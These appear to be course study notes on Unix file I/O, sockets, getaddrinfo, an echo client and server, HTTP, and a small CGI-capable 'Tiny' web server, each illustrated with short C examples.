All files are organized as a hierarchy anchored by root directory named / (slash)
Kernel maintains current working directory (cwd) for each process

Opening Files

Opening a file informs the kernel that you are getting ready to access that file

int fd; /* file descriptor */

if ((fd = open("/etc/hosts", O_RDONLY)) < 0) {
  perror("open");
  exit(1);
}

Returns a small identifying integer file descriptor
- fd == -1 indicates that an error occurred
Each process created by a linux shell begins life with three open files associated with a terminal:
- 0: standard input (stdin)
- 1: standard output (stdout)
- 2: standard error (stderr)

Closing Files

Closing a file informs the kernel that you are finished accessing that file

int fd;     /* file descriptor */
int retval; /* return value */

if ((retval = close(fd)) < 0) {
  perror("close");
  exit(1);
}

Closing an already closed file is a recipe for disaster in threaded programs
Moral: Always check return codes, even for seemingly benign functions such as close()

Reading Files

Reading a file copies bytes from the current file position to memory, and then updates file position

char buf[512];
int fd;     /* file descriptor */
int nbytes; /* number of bytes read */

/* Open file fd ... */
/* Then read up to 512 bytes from file fd */
if ((nbytes = read(fd, buf, sizeof(buf))) < 0) {
  perror("read");
  exit(1);
}

Returns number of bytes read from file fd into buf

Writing Files

Writing a file copies bytes from memory to the current file position, and then updates current file position

char buf[512];
int fd;     /* file descriptor */
int nbytes; /* number of bytes read */

/* Open the file fd ... */
/* Then write up to 512 bytes from buf to file fd */
if ((nbytes = write(fd, buf, sizeof(buf)) < 0) {
  perror("write");
  exit(1);
}

Returns number of bytes written from buf to file fd

Short Counts

Short counts can occur in these situations:
- Encountering (end-of-file) EOF on reads
- Reading text lines from a terminal
- Reading and writing network sockets
Short counts never occur in these situations:
- Reading from disk files (except for EOF)
- Writing to disk files
Best practice is to always allow for short counts

ssize_t readn(int fd, void *buf, size_t size) {
  char *ptr = buf;
  size_t nleft = size;
  ssize_t nread;

  while (nleft > 0) {
    nread = read(fd, ptr, nleft);

    if (nread < 0)
      return -1; // error
    if (nread == 0)
      break; // EOF

    nleft -= nread;
    ptr += nread;
  }

  return (size - nleft);
}

Buffered I/O

Motivation

Applications open read/write one character at a time
- Read line of text one character at a time, stopping at newline
Implementing as Unix I/O calls expensive
- read and write require Unix kernel calls
  - $> 10000$ clock cycles
Solution: Buffered read
- Use Unix read to grab block of bytes
- User input functions take one byte at a time from buffer
  - Refill buffer when empty

Example

Goal: Copying stdin to stdout, one byte at a time

Without builtin buffer

int main() {
  char c;
  while (read(STDIN_FILENO, &c, sizeof(char)))
    write(STDOUT_FILENO, &c, sizeof(char));

  return 0;
}

To many read system calls, wasteful !

With builtin buffer

#define BUFFER_SIZE 1024

ssize_t buffered_getchar(int fd, char *c) {
  static char buf[BUFFER_SIZE];
  static size_t size = 0;
  static size_t pos = 0;

  if (pos >= size) {
    size = read(fd, buf, BUFFER_SIZE);

    if (size <= 0) {
      return -1; // EOF or error
    }
    pos = 0;
  }
  *c = buf[pos++];

  return 1; // success got 1 character
}

Only one read system call.

Metadata, Sharing, and Redirection

File Metadata

Metadata is data about data, in this case file data
Per-file metadata maintained by kernel
- Accessed by users with the stat and fstat functions

/* Metadata returned by the stat and fstat functions */
struct stat {
  dev_t st_dev;             /* Device */
  ino_t st_ino;             /* inode */
  mode_t st_mode;           /* Protection and file type */
  nlink_t st_nlink;         /* Number of hard links */
  uid_t st_uid;             /* User ID of owner */
  gid_t st_gid;             /* Group ID of owner */
  dev_t st_rdev;            /* Device type (if inode device) */
  off_t st_size;            /* Total size, in bytes */
  unsigned long st_blksize; /* Blocksize for filesystem I/O */
  unsigned long st_blocks;  /* Number of blocks allocated */
  time_t st_atime;          /* Time of last access */
  time_t st_mtime;          /* Time of last modification */
  time_t st_ctime;          /* Time of last change */
};

Example of Accessing Metadata

int main(int argc, char **argv) {
  struct stat file_stat;
  char *type, *readok;

  stat(argv[1], &file_stat);

  if (S_ISREG(file_stat.st_mode))    /* Determine file type */
    type = "regular";
  else if (S_ISDIR(file_stat.st_mode))
    type = "directory";
  else
    type = "other";
  if ((file_stat.st_mode & S_IRUSR)) /* Check read access */
    readok = "yes";
  else
    readok = "no";

  printf("type: %s, read: %s\n", type, readok);
  exit(0);
}

Represents Open Files

Two descriptors referencing two distinct open files. Descriptor 1 (stdout) points to terminal, and descriptor 4 points to open disk file

File Sharing

Two distinct descriptors sharing the same disk file through two distinct open file table entries
- E.g., Calling open twice with the same filename argument

Processes Share Files: fork

A child process inherits its parent's open files
- Note: situation unchanged by exec functions (use fcntl to change)

Before fork call:

After fork call:

Child's table same as parent's, and +1 to each refcnt

I/O Redirection

dup2(oldfd, newfd)
- Copies (per-process) descriptor table entry oldfd to entry newfd

Example

Open file to which stdout should be redirected
- Happens in child executing shell code, before exec

Call dup2(4,1)
- Cause fd=1 (stdout) to refer to disk file pointed at by fd=4

Standard I/O

Standard I/O Streams

Standard I/O models open files as streams
- Abstraction for a file descriptor and a buffer in memory
C programs begin life with three open streams (defined in stdio.h)
- stdin: standard input
- stdout: standard output
- stderr: standard error

#include <stdio.h>

extern FILE *stdin;  /* standard input (descriptor 0) */
extern FILE *stdout; /* standard output (descriptor 1) */
extern FILE *stderr; /* standard error (descriptor 2) */

int main() {
  fprintf(stdout, "Hello, world\n");
}

Buffering in Standard I/O

Standard I/O functions use buffered I/O

int main() {
  printf("h");
  printf("e");
  printf("l");
  printf("l");
  printf("o");
  printf("\n");
  fflush(stdout);
  exit(0);
}

Buffer flushed to output fd on \n, call to fflush or exit, or return from main

Network Programming

A Client-Server Transaction

Most network applications are based on the client-server model:
- A server process and one or more client processes
- Server manages some resources
- Server provides service by manipulating resource for clients
- Server activated by request from client (vending machine analogy)

Hardware Organization of a Network Host

Computer Networks

A network is a hierarchical system of boxes and wires organized by geographical proximity
- SAN (System Area Network) spans cluster or machine room
  - Switched Ethernet, Quadrics QSW, ...
- LAN (Local Area Network) spans a building or campus
  - Ethernet is most prominent example
- WAN (Wide Area Network) spans country or world
  - Typically high-speed point-to-point phone lines
An internetwork (internet) is an interconnected set of networks
- The Global IP Internet (uppercase "I") is the most famous example of an internet (lowercase "i")

Lowest Level: Ethernet Segment

Ethernet segment consists of a collection of hosts connected by wires (twisted pairs) to a hub
Spans room or floor in a building
Operation
- Each Ethernet adapter has a unique 48-bit address (MAC address)
  - E.g., 00:16:ea:e3:54:e6
- Hosts send bits to any other host in chunks called frames
- Hub slavishly copies each bit from each port to every other port
  - Every host sees every bit
  - Note: Hubs are on their way out. Bridges (switches, routers) became cheap enough to replace them

Next Level: Bridged Ethernet Segment

Spans building or campus
Bridges cleverly learn which hosts are reachable from which ports and then selectively copy frames from port to port

Conceptual View of LANs

For simplicity, hubs, bridges, and wires are often shown as a collection of hosts attached to a single wire:

Next Level: internets (lower case)

Multiple incompatible LANs can be physically connected by specialized computers called routers
The connected networks are called an internet (lower case)

Logical Structure of an internet

Ad hoc interconnection of networks
- No particular topology
- Vastly different router & link capacities
Send packets from source to destination by hopping through networks
- Router forms bridge from one network to another
- Different packets may take different routes

The Notion of an internet Protocol

How is it possible to send bits across incompatible LANs and WANs ?
Solution: protocol software running on each host and router
- Protocol is a set of rules that governs how hosts and routers should cooperate when they transfer data from network to network
- Smooths out the differences between the different networks

What Does an internet Protocol Do ?

Provides a naming scheme
- An internet protocol defines a uniform format for host addresses
- Each host (and router) is assigned at least one of these internet addresses that uniquely identifies it
Provides a delivery mechanism
- An internet protocol defines a standard transfer unit (packet)
- Packet consists of header and payload
  - Header: contains info such as packet size, source and destination addresses
  - Payload: contains data bits sent from source host

Transferring internet Data Via Encapsulation

Other Issues

We are glossing over a number of important questions:
- What if different networks have different maximum frame sizes ? (segmentation)
- How do routers know where to forward frames ?
- How are routers informed when the network topology changes ?
- What if packets get lost ?
These (and other) questions are addressed by the area of systems known as computer networking

Global IP Internet (upper case)

Most famous example of an internet
Based on the TCP/IP protocol family
- IP (Internet Protocol):
  - Provides basic naming scheme and unreliable delivery capability of packets (datagrams) from host-to-host
- UDP (Unreliable Datagram Protocol)
  - Uses IP to provide unreliable datagram delivery from process-to-process
- TCP (Transmission Control Protocol)
  - Uses IP to provide reliable byte streams from process-to-process over connections
Accessed via a mix of Unix file I/O and functions from the sockets interface

Hardware and Software Organization of an Internet Application

A Programmer's View of the Internet

Hosts are mapped to a set of 32-bit IP addresses
The set of IP addresses is mapped to a set of identifiers called Internet domain names
A process on one Internet host can communicate with a process on another Internet host over a connection

Aside: IPv4 and IPv6

The original Internet Protocol, with its 32-bit addresses, is known as Internet Protocol Version 4 (IPv4)
1996: Internet Engineering Task Force (IETF) introduced Internet Protocol Version 6 (IPv6) with 128-bit addresses
- Intended as the successor to IPv4

IP Addresses

32-bit IP addresses are stored in an IP address struct
- IP addresses are always stored in memory in network byte order (big-endian byte order)
- True in general for any integer transferred in a packet header from one machine to another
  - E.g., the port number used to identify an Internet connection

/* Internet address structure */
struct in_addr {
  uint32_t s_addr; /* network byte order (big-endian) */
};

Dotted Decimal Notation

By convention, each byte in a 32-bit IP address is represented by its decimal value and separated by a period
- IP address: 0x8002C2F2 = 128.2.194.242
Use getaddrinfo and getnameinfo functions to convert between IP addresses and dotted decimal format

IP Address Structure

IP (V4) Address space divided into classes:

Network ID Written in form w.x.y.z/n
- n = number of bits in network address (Net ID)
- E.g., CMU written as 128.2.0.0/16
  - Class B address
Unrouted (private) IP addresses:
- 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16

Internet Domain Names

Domain Naming System (DNS)

The Internet maintains a mapping between IP addresses and domain names in a huge worldwide distributed database called DNS
Conceptually, programmers can view the DNS database as a collection of millions of host entries
- Each host entry defines the mapping between a set of domain names and IP addresses
- In a mathematical sense, a host entry is an equivalence class of domain names and IP addresses

Basic Internet Components

Internet backbone
- Collection of routers (nationwide or worldwide) connected by high-speed point-to-point networks
Internet Exchange Points (IXP)
- Router that connects multiple backbones (often referred to as peers)
- Also called Network Access Points (NAP)
Regional networks
- Smaller backbones that cover smaller geographical areas (e.g., cities or states)
Point of presence (POP)
- Machine that is connected to the Internet
Internet Service Providers (ISPs)
- Provide dial-‐up or direct access to POPs

Internet Connection Hierarchy

Internet Connections

Clients and servers communicate by sending streams of bytes over connections. Each connection is:
- Point-to-point: connects a pair of processes
- Full-duplex: data can flow in both directions at the same time
- Reliable: stream of bytes sent by the source is eventually received by the destination in the same order it was sent
A socket is an endpoint of a connection
- Socket address is an IPaddress:Port pair
A port is a 16-bit integer that identifies a process:
- Ephemeral port: Assigned automatically by client kernel when client makes a connection request
- Well‐known port: Associated with some service provided by a server (e.g., port 80 is associated with Web servers)

Well-known Ports and Service Names

Popular services have permanently assigned well-known ports and corresponding well-known service names:
- echo server: 7/echo
- ssh servers: 22/ssh
- email server: 25/smtp
- web servers: 80/http
Mappings between well-known ports and service names is contained in the file /etc/services on each Linux machine

Anatomy of a Connection

A connection is uniquely identified by the socket addresses of its endpoints (socket pair)
- (cliaddr:cliport, servaddr:servport)

Using Ports to Identify Services

Sockets

What is a socket ?
- To the kernel, a socket is an endpoint of communication
- To an application, a socket is a file descriptor that lets the application read/write from/to the network
  - Remember: All Unix I/O devices, including networks, are modeled as files
Clients and servers communicate with each other by reading from and writing to socket descriptors

The main distinction between regular file I/O and socket I/O is how the application "opens" the socket descriptors

Socket Address Structures

Generic socket address:
- For address arguments to connect, bind, and accept
- Necessary only because C did not have generic (void *) pointers when the sockets interface was designed
- For casting convenience, we adopt the Stevens convention: typedef struct sockaddr SA;

struct sockaddr {
  uint16_t sa_family; /* Protocol family */
  char sa_data[14];   /* Address data */
};

Internet-specific socket address:
- Must cast (struct sockaddr_in *) to (struct sockaddr *) for functions that take socket address arguments

struct sockaddr_in {
  uint16_t sin_family;       /* Protocol family (always AF_INET) */
  uint16_t sin_port;         /* Port num in network byte order */
  struct in_addr sin_addr;   /* IP addr in network byte order */
  unsigned char sin_zero[8]; /* Pad to sizeof(struct sockaddr) */
};

Sockets Interface

Set of system-level functions used in conjunction with Unix I/O to build network applications
Created in the early 80's as part of the original Berkeley distribution of Unix that contained an early version of the Internet protocols
Available on all modern systems

socket

Clients and servers use the socket function to create a socket descriptor: int socket(int domain, int type, int protocol)
Example: int clientfd = socket(AF_INET, SOCK_STREAM, 0);

:::tip Protocol specific ! Best practice is to use getaddrinfo to generate the parameters automatically, so that code is protocol independent. :::

bind

A server uses bind to ask the kernel to associate the server's socket address with a socket descriptor: int bind(int sockfd, SA *addr, socklen_t addrlen);
The process can read bytes that arrive on the connection whose endpoint is addr by reading from descriptor sockfd
Similarly, writes to sockfd are transferred along connection whose endpoint is addr

:::tip Best practice is to use getaddrinfo to supply the arguments addr and addrlen. :::

listen

By default, kernel assumes that descriptor from socket function is an active socket that will be on the client end of a connection
A server calls the listen function to tell the kernel that a descriptor will be used by a server rather than a client: int listen(int sockfd, int backlog);
Converts sockfd from an active socket to a listening (passive) socket that can accept connection requests from clients
backlog is a hint about the number of outstanding connection requests that the kernel should queue up before starting to refuse requests

accept

Servers wait for connection requests from clients by calling accept: int accept(int listenfd, SA *addr, int *addrlen);
Waits for connection request to arrive on the connection bound to listenfd, then fills in client's socket address in addr and size of the socket address in addrlen
Returns a connected descriptor that can be used to communicate with the client via Unix I/O routines

connect

A client establishes a connection with a server by calling connect: int connect(int clientfd, SA *addr, socklen_t addrlen);
Attempts to establish a connection with server at socket address addr
- If successful, then clientfd is now ready for reading and writing
- Resulting connection is characterized by socket pair (x:y, addr.sin_addr:addr.sin_port)
  - x is client address
  - y is ephemeral port that uniquely identifies client process on client host

:::tip Best practice is to use getaddrinfo to supply the arguments addr and addrlen. :::

Connected vs. Listening Descriptors

Listening descriptor
- End point for client connection requests
- Created once and exists for lifetime of the server
Connected descriptor
- End point of the connection between client and server
- A new descriptor is created each time the server accepts a connection request from a client
- Exists only as long as it takes to service client
Why the distinction ?
- Allows for concurrent servers that can communicate over many client connections simultaneously
  - E.g., Each time we receive a new request, we fork a child to handle the request

Host and Service Conversion

getaddrinfo

getaddrinfo is the modern way to convert string representations of hostnames, host addresses, ports, and service names to socket address structures
- Replaces obsolete gethostbyname and getservbyname functions
Advantages:
- Reentrant (can be safely used by threaded programs)
- Allows us to write portable protocol-independent code
  - Works with both IPv4 and IPv6
Disadvantages:
- Somewhat complex
- Fortunately, a small number of usage patterns suffice in most cases

int getaddrinfo(const char *host,             /* Hostname or address */
                const char *service,          /* Port or service name */
                const struct addrinfo *hints, /* Input parameters */
                struct addrinfo **result);    /* Output linked list */

void freeaddrinfo(struct addrinfo *result);   /* Free linked list */

const char *gai_strerror(int errcode);        /* Return error msg. */

Given host and service, getaddrinfo returns result that points to a linked list of addrinfo structs, each of which points to a corresponding socket address struct, and which contains arguments for the sockets interface functions
Helper functions:
- freeadderinfo frees the entire linked list
- gai_strerror converts error code to an error message

Linked List Returned by getaddrinfo

Clients: walk this list, trying each socket address in turn, until the calls to socket and connect succeed
Servers: walk the list until calls to socket and bind succeed

addrinfo Struct

struct addrinfo {
  int ai_flags;             /* Hints argument flags */
  int ai_family;            /* First arg to socket function */
  int ai_socktype;          /* Second arg to socket function */
  int ai_protocol;          /* Third arg to socket function */
  char *ai_canonname;       /* Canonical host name */
  size_t ai_addrlen;        /* Size of ai_addr struct */
  struct sockaddr *ai_addr; /* Ptr to socket address structure */
  struct addrinfo *ai_next; /* Ptr to next item in linked list */
};

Each addrinfo struct returned by getaddrinfo contains arguments that can be passed directly to socket function
Also points to a socket address struct that can be passed directly to connect and bind functions

getnameinfo

getnameinfo is the inverse of getaddrinfo, converting a socket address to the corresponding host and service
- Replaces obsolete gethostbyaddr and getservbyport functions
- Reentrant and protocol independent

int getnameinfo(const SA *sa, socklen_t salen, /* In: socket addr */
                char *host, size_t hostlen,    /* Out: host */
                char *serv, size_t servlen,    /* Out: service */
                int flags);                    /* optional flags */

Conversion Example

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXLINE NI_MAXHOST

typedef struct addrinfo SA;

int main(int argc, char **argv) {
  SA *p, *listp, hints;
  char buf[MAXLINE];
  int rc, flags;

  /* Get a list of addrinfo records */
  memset(&hints, 0, sizeof(SA));
  hints.ai_family = AF_INET;       /* IPv4 only */
  hints.ai_socktype = SOCK_STREAM; /* Connections only */

  if ((rc = getaddrinfo(argv[1], NULL, &hints, &listp)) != 0) {
    fprintf(stderr, "getaddrinfo error: %s\n", gai_strerror(rc));
    exit(1);
  }

  /* Walk the list and display each IP address */
  flags = NI_NUMERICHOST; /* Display address instead of name */
  for (p = listp; p; p = p->ai_next) {
    getnameinfo(p->ai_addr, p->ai_addrlen, buf, MAXLINE, NULL, 0, flags);
    printf("%s\n", buf);
  }

  /* Clean up */
  freeaddrinfo(listp);
  exit(0);
}

Echo Client Example

open_clientfd

Establish a connection with a server

int open_clientfd(char *hostname, char *port) {
  int clientfd;
  struct addrinfo hints, *listp, *p;

  /* Get a list of potential server addresses */
  memset(&hints, 0, sizeof(struct addrinfo));
  hints.ai_socktype = SOCK_STREAM; /* Open a connection */
  hints.ai_flags = AI_NUMERICSERV; /* Using numeric port arg. */
  hints.ai_flags |= AI_ADDRCONFIG; /* Recommended for connections */

  getaddrinfo(hostname, port, &hints, &listp);

  /* Walk the list for one that we can successfully connect to */
  for (p = listp; p; p = p->ai_next) {
    /* Create a socket descriptor */
    if ((clientfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) < 0)
      continue; /* Socket failed, try the next */

    /* Connect to the server */
    if (connect(clientfd, p->ai_addr, p->ai_addrlen) != -1)
      break; /* Success */
    close(clientfd); /* Connect failed, try another */
  }

  /* Clean up */
  freeaddrinfo(listp);

  if (!p) /* All connects failed */
    return -1;
  else    /* The last connect succeeded */
    return clientfd;
}

open_listenfd

Create a listening descriptor that can be used to accept connection requests from clients

int open_listenfd(char *port) {
  struct addrinfo hints, *listp, *p;
  int listenfd, optval = 1;

  /* Get a list of potential server addresses */
  memset(&hints, 0, sizeof(struct addrinfo));
  hints.ai_socktype = SOCK_STREAM;             /* Accept connect. */
  hints.ai_flags = AI_PASSIVE | AI_ADDRCONFIG; /* On any IP addr */
  hints.ai_flags |= AI_NUMERICSERV;            /* Using port no. */

  getaddrinfo(NULL, port, &hints, &listp);

  /* Walk the list for one that we can bind to */
  for (p = listp; p; p = p->ai_next) {
    /* Create a socket descriptor */
    if ((listenfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) < 0)
      continue; /* Socket failed, try the next */

    /* Eliminates "Address already in use" error from bind */
    setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (const void *)&optval , sizeof(int));

    /* Bind the descriptor to the address */
    if (bind(listenfd, p->ai_addr, p->ai_addrlen) == 0)
      break; /* Success */
    close(listenfd); /* Bind failed, try the next */
  }

  /* Clean up */
  freeaddrinfo(listp);

  if (!p) /* No address worked */
    return -1;

  /* Make it a listening socket ready to accept conn. requests */
  if (listen(listenfd, LISTENQ) < 0) {
    close(listenfd);
    return -1;
  }
  return listenfd;
}

:::note open_clientfd and open_listenfd are both independent of any particular version of IP. :::

Echo Client

#include <csapp.h>

int main(int argc, char **argv) {
  int clientfd;
  char *host, *port, buf[MAXLINE];
  rio_t rio;

  host = argv[1];
  port = argv[2];

  clientfd = open_clientfd(host, port);
  rio_readinitb(&rio, clientfd);

  while (fgets(buf, MAXLINE, stdin) != NULL) {
    rio_writen(clientfd, buf, strlen(buf));
    rio_readlineb(&rio, buf, MAXLINE);
    fputs(buf, stdout);
  }
  close(clientfd);
  exit(0);
}

Iterative Echo Server

#include <csapp.h>

void echo(int connfd);

int main(int argc, char **argv) {
  int listenfd, connfd;
  socklen_t clientlen;
  struct sockaddr_storage clientaddr; /* Enough room for any addr */
  char client_hostname[MAXLINE], client_port[MAXLINE];

  listenfd = open_listenfd(argv[1]);
  while (1) {
    clientlen = sizeof(struct sockaddr_storage); /* Important! */
    connfd = accept(listenfd, (SA *)&clientaddr, &clientlen);
    getnameinfo((SA *)&clientaddr, clientlen, client_hostname, MAXLINE, client_port, MAXLINE, 0);
    printf("Connected to (%s, %s)\n", client_hostname, client_port);
    echo(connfd);
    close(connfd);
  }
  exit(0);
}

echo

The server uses RIO to read and echo text lines until EOF (end-of-file) condition is encountered
- EOF condition caused by client calling close(clientfd)

void echo(int connfd) {
  size_t n;
  char buf[MAXLINE];
  rio_t rio;

  rio_readinitb(&rio, connfd);
  while((n = rio_readlineb(&rio, buf, MAXLINE)) != 0) {
    printf("server received %d bytes\n", (int)n);
    rio_writen(connfd, buf, n);
  }
}

Web Server Basics

Clients and servers communicate using the Hyper Text Transfer Protocol (HTTP)
- Client and server establish TCP connection
- Client requests content
- Server responds with requested content
- Client and server close connection (eventually)
HTTP/1.1 RFC 2616, June, 1999
- https://www.w3.org/Protocols/rfc2616/rfc2616.html

HTTP Versions

Major differences between HTTP/1.1 and HTTP/1.0
- HTTP/1.0 uses a new connection for each transaction
- HTTP/1.1 also supports persistent connections
  - Multiple transactions over the same connection
  - Connection: Keep-Alive
- HTTP/1.1 requires HOST header
  - Host: www.cmu.edu
  - Makes it possible to host multiple websites at single Internet host
- HTTP/1.1 supports chunked encoding
  - Transfer-Encoding: chunked
- HTTP/1.1 adds additional support for caching

Web Content

Web servers return content to clients
- content: a sequence of bytes with an associated MIME (Multipurpose Internet Mail Extensions) type
Example MIME types
- text/html -- HTML document
- text/plain -- Unformatted text
- image/gif -- Binary image encoded in GIF format
- image/png -- Binary image encoded in PNG format
- image/jpeg -- Binary image encoded in JPEG format
The complete list of MIME types: https://www.iana.org/assignments/media-types/media-types.xhtml

Static and Dynamic Content

The content returned in HTTP responses can be either static or dynamic
- Static content: content stored in files and retrieved in response to an HTTP request
  - E.g., HTML files, images, audio clips
  - Request identifies which content file
- Dynamic content: content produced on-the-fly in response to an HTTP request
  - E.g., content produced by a program executed by the server on behalf of the client
  - Request identifies file containing executable code
Bottom line: Web content is associated with a file that is managed by the server

URLs

Unique name for a file: URL (Universal Resource Locator)
- Example URL: http://www.cmu.edu:80/index.html
Clients use prefix (http://www.cmu.edu:80) to infer:
- What kind (protocol) of server to contact (HTTP)
- Where the server is (www.cmu.edu)
- What port it is listening on (80)
Servers use suffix (/index.html) to:
- Determine if request is for static or dynamic content
  - No hard and fast rules for this
  - One convention: executables reside in cgi-bin directory
- Find file on file system
  - Initial / in suffix denotes home directory for requested content
  - Minimal suffix is /, which server expands to configured default filename (usually, index.html)

HTTP Requests

HTTP request is a request line, followed by zero or more request headers
Request line: <method> <uri> <version>
- <method> is one of GET, POST, OPTIONS, HEAD, PUT, DELETE, or TRACE
- <uri> is typically URL for proxies, URL suffix for servers
  - A URL is a type of URI (Uniform Resource Identifier)
  - https://www.ietf.org/rfc/rfc2396.txt
- <version> is HTTP version of request (HTTP/1.0 or HTTP/1.1)
Request headers: <header name>: <header data>
- Provide additional information to the server

HTTP Responses

HTTP response is a response line followed by zero or more response headers, possibly followed by content, with blank line (\r\n) separating headers from content
Response line: <version> <status code> <status msg>
- <version> is HTTP version of the response
- <status code> is numeric status
- <status msg> is corresponding English text
  - 200 OK -- Request was handled without error
  - 301 Moved -- Provide alternate URL
  - 404 Not found -- Server couldn't find the file
- Response headers: <header name>: <header data>
  - Provide additional information about response
  - Content-Type: MIME type of content in response body
  - Content-Length: Length of content in response body

Data Transfer Mechanisms

Standard
- Specify total length with content-length
- Requires that program buffer entire message
Chunked
- Break into blocks
- Prefix each block with number of bytes (Hex coded)

Chunked Encoding Example

HTTP/1.1 200 OK\n
Date: Sun, 31 Oct 2010 20:47:48 GMT\n
Server: Apache/1.3.41 (Unix)\n
Keep-Alive: timeout=15, max=100\n
Connection: Keep-Alive\n
Transfer-Encoding: chunked\n
Content-Type: text/html\n
\r\n
d75\r\n
<html>
<head>
.<link href="http://www.cs.cmu.edu/style/calendar.css" rel="stylesheet" type="text/css">
</head>
<body id="calendar_body">
<div id='calendar'><table width='100%' border='0' cellpadding='0' cellspacing='1' id='cal'>
...
</body>
</html>
\r\n
0\r\n
\r\n

d75\r\n -- First Chunk: 0xd75 = 3445 bytes
0\r\n -- Second Chunk: 0 bytes (indicates last chunk)

Example HTTP Transaction

whaleshark> telnet www.cmu.edu 80             Client: open connection to server
Trying 128.2.42.52...                         Telnet prints 3 lines to terminal
Connected to WWW-CMU-PROD-VIP.ANDREW.cmu.edu.
Escape character is '^]'.
GET / HTTP/1.1                                Client: request line
Host: www.cmu.edu                             Client: required HTTP/1.1 header
                                              Client: empty line terminates headers
HTTP/1.1 301 Moved Permanently                Server: response line
Date: Wed, 05 Nov 2014 17:05:11 GMT           Server: followed by 5 response headers
Server: Apache/1.3.42 (Unix)                  Server: this is an Apache server
Location: http://www.cmu.edu/index.shtml      Server: page has moved here
Transfer-Encoding: chunked                    Server: response body will be chunked
Content-Type: text/html; charset=...          Server: expect HTML in response body
                                              Server: empty line terminates headers
15c                                           Server: first line in response body
<HTML><HEAD>                                  Server: start of HTML content
...
</BODY></HTML>                                Server: end of HTML content
0                                             Server: last line in response body
Connection closed by foreign host.            Server: closes connection

HTTP standard requires that each text line end with \r\n
Blank line (\r\n) terminates request and response headers

Tiny Web Server

Tiny Web server described in text
- Tiny is a sequential Web server
- Serves static and dynamic content to real browsers
- 239 lines of commented C code
- Not as complete or robust as a real Web server
  - You can break it with poorly-formed HTTP requests (e.g., terminate lines with \n instead of \r\n)

Operation

Accept connection from client
Read request from client (via connected socket)
Split into <method> <uri> <version>
- If method not GET, then return error
If URI contains cgi-bin then serve dynamic content
- Would do wrong thing if had file abcgi-bingo.html
- Fork process to execute program
Otherwise serve static content
- Copy file to output

Serving Static Content

void serve_static(int fd, char *filename, int filesize) {
  int srcfd;
  char *srcp, filetype[MAXLINE], buf[MAXBUF];

  /* Send response headers to client */
  get_filetype(filename, filetype);
  sprintf(buf, "HTTP/1.0 200 OK\r\n");
  sprintf(buf, "%sServer: Tiny Web Server\r\n", buf);
  sprintf(buf, "%sConnection: close\r\n", buf);
  sprintf(buf, "%sContent-length: %d\r\n", buf, filesize);
  sprintf(buf, "%sContent-type: %s\r\n\r\n", buf, filetype);
  rio_writen(fd, buf, strlen(buf));

  /* Send response body to client */
  srcfd = open(filename, O_RDONLY, 0);
  srcp = mmap(0, filesize, PROT_READ, MAP_PRIVATE, srcfd, 0);
  close(srcfd);
  rio_writen(fd, srcp, filesize);
  munmap(srcp, filesize);
}

Serving Dynamic Content

Client sends request to server
If request URI contains the string /cgi-bin, the Tiny server assumes that the request is for dynamic content

The server creates a child process and runs the program identified by the URI in that process

The child runs and generates the dynamic content
The server captures the content of the child and forwards it without modification to the client

Issues in Serving Dynamic Content

How does the client pass program arguments to the server ?
How does the server pass these arguments to the child ?
How does the server pass other info relevant to the request to the child ?
How does the server capture the content produced by the child ?
These issues are addressed by the Common Gateway Interface (CGI) specification

CGI

Because the children are written according to the CGI spec, they are often called CGI programs
However, CGI really defines a simple standard for transferring information between the client (browser), the server, and the child process
CGI is the original standard for generating dynamic content. Has been largely replaced by other, faster techniques:
- E.g., fastCGI, Apache modules, Java servlets, Rails controllers
- Avoid having to create process on the fly (expensive and slow)

Serving Dynamic Content With GET

Client pass arguments to the server by appended the arguments to the URI
Can be encoded directly in a URL typed to a browser or a URL in an HTML link
- http://add.com/cgi-bin/adder?15213&18213
- adder is the CGI program on the server that will do the addition
- Argument list starts with ?
- Arguments separated by &
- Spaces represented by + or %20
URL suffix: cgi-bin/adder?15213&18213
Result displayed on browser:

Welcome to add.com: THE Internet addition portal.

The answer is: 15213 + 18213 = 33426

Thanks for visiting!

The server pass these arguments to the child by environment variable in QUERY_STRING
- A single string containing everything after the ?
- For add: QUERY_STRING = 15213&18213

/* Extract the two arguments */
if ((buf = getenv("QUERY_STRING")) != NULL) {
  p = strchr(buf, '&');
  *p = '\0';
  strcpy(arg1, buf);
  strcpy(arg2, p+1);
  n1 = atoi(arg1);
  n2 = atoi(arg2);
}

The child generates its output on stdout. Server uses dup2 to redirect stdout to its connected socket. So the server capture the content produced by the child

void serve_dynamic(int fd, char *filename, char *cgiargs) {
  char buf[MAXLINE], *emptylist[] = { NULL };

  /* Return first part of HTTP response */
  sprintf(buf, "HTTP/1.0 200 OK\r\n");
  rio_writen(fd, buf, strlen(buf));
  sprintf(buf, "Server: Tiny Web Server\r\n");
  rio_writen(fd, buf, strlen(buf));

  if (fork() == 0) { /* Child */
    /* Real server would set all CGI vars here */
    setenv("QUERY_STRING", cgiargs, 1);
    dup2(fd, STDOUT_FILENO);              /* Redirect stdout to client */
    execve(filename, emptylist, environ); /* Run CGI program */
  }
  wait(NULL); /* Parent waits for and reaps child */
}

Notice that only the CGI child process knows the content type and length, so it must generate those headers

/* Make the response body */
sprintf(content, "Welcome to add.com: ");
sprintf(content, "%sTHE Internet addition portal.\r\n<p>", content);
sprintf(content, "%sThe answer is: %d + %d = %d\r\n<p>", content, n1, n2, n1 + n2);
sprintf(content, "%sThanks for visiting!\r\n", content);

/* Generate the HTTP response */
printf("Content-length: %d\r\n", (int)strlen(content));
printf("Content-type: text/html\r\n\r\n");
printf("%s", content);
fflush(stdout);
exit(0);

Proxies

A proxy is an intermediary between a client and an origin server
- To the client, the proxy acts like a server
- To the server, the proxy acts like a client

Why Proxies ?

Can perform useful functions as requests and responses pass by
- Examples: Caching, logging, anonymization, filtering, transcoding

Concurrent Programming

Concurrent Programming is Hard

The human mind tends to be sequential
The notion of time is often misleading
Thinking about all possible sequences of events in a computer system is at least error prone and frequently impossible
Classical problem classes of concurrent programs:
- Races: outcome depends on arbitrary scheduling decisions elsewhere in the system
  - Example: who gets the last seat on the airplane ?
- Deadlock: improper resource allocation prevents forward progress
  - Example: traffic gridlock
- Livelock / Starvation / Fairness: external events and/or system scheduling decisions can prevent sub-task progress
  - Example: people always jump in front of you in line

Iterative Servers

Iterative servers process one request at a time

Second client attempts to connect to iterative server
Call to connect returns
- Even though connection not yet accepted
- Server side TCP manager queues request
